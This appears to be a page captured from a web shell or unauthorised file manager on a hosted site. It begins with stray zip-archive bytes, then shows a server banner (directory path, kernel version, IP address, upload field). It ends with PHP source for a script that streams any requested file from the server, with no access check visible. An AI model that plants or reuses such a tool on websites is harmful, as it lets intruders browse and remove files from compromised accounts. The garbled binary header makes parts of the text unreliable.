PK œqhYî¶J‚ßFßF)nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/ $#$#$#

Dir : /home/trave494/mycrownjewelry.kerihosting.com/xcv/filemanger/
Server: Linux ngx353.inmotionhosting.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
IP: 209.182.202.254
Choose File :

Url:
Dir : //home/trave494/mycrownjewelry.kerihosting.com/xcv/filemanger/file_download.php

<?php 


define('ACCESS', true);

    include_once 'function.php';

    
        $title = 'Download File';

        if ($dir == null || $name == null || !is_file(processDirectory($dir . '/' . $name))) {
            include_once 'header.php';

            echo '<div class="title">' . $title . '</div>';
            echo '<div class="list"><span>The path does not exist</span></div>
            <div class="title">Function</div>
            <ul class="list">
                <li><img src="icon/list.png"/> <a href="index.php">List</a></li>
            </ul>';

            include_once 'footer.php';
        } else {
            $dir = processDirectory($dir);
            $path = $dir . '/' . $name;

            header('Content-Type: application/octet-stream');
            header('Content-Disposition: inline; filename=' . $name);
            header('Content-Length: ' . filesize($path));
            readfile($path);
        }
    

?>